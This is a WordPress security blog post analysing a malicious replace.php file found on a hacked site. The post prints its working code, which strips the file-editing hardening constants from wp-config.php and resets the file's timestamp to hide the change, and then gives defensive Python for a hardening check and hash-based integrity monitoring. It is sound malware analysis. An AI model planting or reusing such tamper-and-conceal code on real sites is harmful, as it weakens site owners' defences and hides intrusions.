Reverse Hardening WordPress Config

July 30, 2019 by Luke Leal

Hardening is the process of securing a website or system against known security weaknesses or potential issues to reduce the attack surface. The more functions or features a website has, the more potential points of entry an attacker has to leverage.

For example, a popular method for hardening WordPress installations is to disable the backend theme and plugin editor, which normally allows direct modification to the code in any theme or plugin file.

Theme & Plugin Installers Used as Entry Points

Attackers can also take advantage of the theme and plugin installers within the wp-admin backend. However, instead of installing a legitimate theme or plugin, they use this feature to install a backdoor and maintain access to a compromised website.

Thankfully, WordPress has a feature that allows website owners to disable both the theme and plugin file editors and installers.

To accomplish this, the owner just needs to add a line to their wp-config.php file:

define( 'DISALLOW_FILE_EDIT', true ); //disables file editor
define( 'DISALLOW_FILE_MODS', true ); //disables both file editor and installer

Hardening Methods Reversed in wp-config.php

Since hackers are aware of the attack surface areas, it also makes sense that they would be aware of the most popular hardening methods and respond accordingly.

During a recent website cleanup, the following file was added to the hacked website to reverse the hardening method we described for wp-config.php.

./wp-admin/maint/replace.php:
<?php
$str = file_get_contents("../../wp-config.php");
$str = str_replace("define('DISALLOW_FILE_EDIT', true);","",$str);
$str = str_replace("define('DISALLOW_FILE_MODS', true);","",$str);
$ftime1 = filemtime("../../wp-config.php");
file_put_contents("../../wp-config.php", $str);
touch("../../wp-config.php", $ftime1, $ftime1);
echo "okok.";
?>

In this example, we found the malicious replace.php script in ./wp-admin/maint/.

When run, the PHP script reads wp-config.php (two directory levels above its own location). It then uses str_replace to remove the define() lines for DISALLOW_FILE_EDIT and DISALLOW_FILE_MODS from the file contents, and records the file's modification timestamp with filemtime before writing the altered contents back.

After the contents of the wp-config.php file have been written, the script finally uses the touch function to reset the modification timestamp on wp-config.php to its previous value in order to avoid detection.
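A defender can verify that the two hardening constants are still defined as true rather than relying on the file's timestamp. The following is an added example, not code from the Sucuri post or plugin: it parses boolean define() statements out of wp-config.php with a regex that accepts either quote style and any spacing (the post's own replace.php only matches one exact spelling, so a check must not be equally brittle), and reports which hardening constants are absent or set to false. The sample configs below are constructed for the demonstration.

```python
"""Check that the wp-config.php hardening constants are still in place.

Added example (not code from the Sucuri post): it parses boolean
define() statements out of a wp-config.php and reports which of the
two hardening constants are absent or set to false.  The regex accepts
either quote style and any spacing, so it recognises the constants
however the site owner formatted them.
"""
import re

HARDENING_CONSTANTS = ("DISALLOW_FILE_EDIT", "DISALLOW_FILE_MODS")

# define( 'NAME', true );  with single or double quotes, optional
# whitespace, and an optional trailing comment (as in the post's lines).
DEFINE_RE = re.compile(
    r"""define\s*\(\s*(['"])(?P<name>[A-Za-z_][A-Za-z0-9_]*)\1\s*,\s*"""
    r"""(?P<value>true|false)\s*\)\s*;""",
    re.IGNORECASE,
)


def parse_bool_defines(source: str) -> dict:
    """Return {CONSTANT: bool} for every boolean define() in PHP source."""
    return {
        m.group("name").upper(): m.group("value").lower() == "true"
        for m in DEFINE_RE.finditer(source)
    }


def hardening_status(source: str) -> dict:
    """Map each hardening constant to True, False, or None (not defined)."""
    defines = parse_bool_defines(source)
    return {name: defines.get(name) for name in HARDENING_CONSTANTS}


def missing_hardening(source: str) -> list:
    """Constants that are not defined as true; an empty list means hardened."""
    return [n for n, v in hardening_status(source).items() if v is not True]


# Constructed sample: the hardened file, and the same file after the
# two define() lines were stripped (the state left by the post's script).
HARDENED = """<?php
define( 'DB_NAME', 'wordpress' );
define( 'WP_DEBUG', false );
define( 'DISALLOW_FILE_EDIT', true ); //disables file editor
define("DISALLOW_FILE_MODS",true);
require_once ABSPATH . 'wp-settings.php';
"""
STRIPPED = HARDENED.replace(
    "define( 'DISALLOW_FILE_EDIT', true ); //disables file editor\n", ""
).replace('define("DISALLOW_FILE_MODS",true);\n', "")

if __name__ == "__main__":
    for label, src in (("hardened", HARDENED), ("stripped", STRIPPED)):
        print(label, hardening_status(src), "missing:", missing_hardening(src))
```

Run against a real installation by reading wp-config.php into a string and alerting whenever missing_hardening() returns a non-empty list; a constant explicitly set to false is reported the same way as one that was deleted, since both leave the editor and installer enabled.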

Conclusion

In this particular case, the hacker compromised the website with an entirely different method and then added this malicious PHP file to further weaken the overall security of the website.

Unfortunately, there are a variety of other ways for hackers to compromise a website without using the theme and plugin editors or installers.

Employing a file integrity monitoring service like the free Sucuri WordPress plugin can be extremely helpful for early detection of a website hack. File integrity monitors won’t be fooled by altered timestamps. They are designed to alert website owners as soon as any changes to files are made against the baseline or last known good configuration.
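The reason a content-based integrity monitor is not fooled by the touch() trick is that it compares hashes, not timestamps. The following is an added example, not the Sucuri plugin's code: it records a SHA-256 and the mtime of every file under a directory, then diffs a later scan against that baseline, classifying a hash change as "modified" regardless of mtime and a timestamp-only change separately. The demo() function builds a constructed scenario in a temporary directory (a wp-config.php whose contents change while its original mtime is restored, and an index.php that is merely touched).

```python
"""Content-hash file integrity baseline that does not trust timestamps.

Added example, not the Sucuri plugin's code.  It records a SHA-256 and
the mtime of every file under a directory, then compares a later scan
against that baseline.  Changes are decided by hash alone, so a file
whose contents were rewritten and whose mtime was then put back with
touch() is still reported as modified.
"""
import hashlib
import os
import tempfile
from pathlib import Path


def sha256_of(path: Path) -> str:
    """Stream the file so large uploads do not have to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path) -> dict:
    """Map relative path -> (sha256, mtime_ns) for each regular file under root."""
    return {
        str(p.relative_to(root)): (sha256_of(p), p.stat().st_mtime_ns)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def compare(root: Path, baseline: dict) -> dict:
    """Diff the tree against a baseline.

    modified:      content hash differs (regardless of mtime)
    mtime_only:    content identical but the timestamp moved
    added/removed: files that appeared or disappeared
    """
    current = build_baseline(root)
    report = {"modified": [], "mtime_only": [], "added": [], "removed": []}
    for rel, (digest, mtime_ns) in current.items():
        if rel not in baseline:
            report["added"].append(rel)
        elif baseline[rel][0] != digest:
            report["modified"].append(rel)
        elif baseline[rel][1] != mtime_ns:
            report["mtime_only"].append(rel)
    report["removed"] = sorted(set(baseline) - set(current))
    return report


def demo() -> dict:
    """Constructed scenario in a temp dir: wp-config.php loses its hardening
    line and gets its original mtime back; index.php is only touched."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        cfg = root / "wp-config.php"
        idx = root / "index.php"
        cfg.write_text("<?php\ndefine( 'DISALLOW_FILE_MODS', true );\n")
        idx.write_text("<?php\nrequire __DIR__ . '/wp-blog-header.php';\n")
        baseline = build_baseline(root)

        # Content change with the timestamp restored afterwards: the state
        # the post's replace.php leaves behind, reproduced in the fixture only.
        t = cfg.stat().st_mtime_ns
        cfg.write_text("<?php\n\n")
        os.utime(cfg, ns=(t, t))

        # Timestamp change with identical content.
        t2 = idx.stat().st_mtime_ns + 10**9
        os.utime(idx, ns=(t2, t2))

        report = compare(root, baseline)
        # A check that only compared mtimes would clear wp-config.php:
        report["cfg_mtime_unchanged"] = cfg.stat().st_mtime_ns == t
        return report


if __name__ == "__main__":
    print(demo())
```

In production the baseline would be stored outside the web root (an attacker who can write wp-config.php can also rewrite a baseline kept beside it) and refreshed only after a deliberate, reviewed change such as a plugin update; the mtime_only bucket is worth logging too, because timestamps that move without content changes are unusual on a site that is not being edited.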

Categories: Website Security, WordPress Security
Tags: Black Hat Tactics, Hacked Websites, WordPress Plugins and Themes

About Luke Leal

Luke Leal is a member of the Malware Research team and joined the company in 2015. Luke's main responsibilities include threat research and malware analysis, which is used to improve our tools. His professional experience covers over eight years of deobfuscating malware code and using unique data from it to help in correlating patterns. When he’s not researching infosec issues or working on websites, you might find Luke traveling and learning about new things. Connect with him on Twitter.
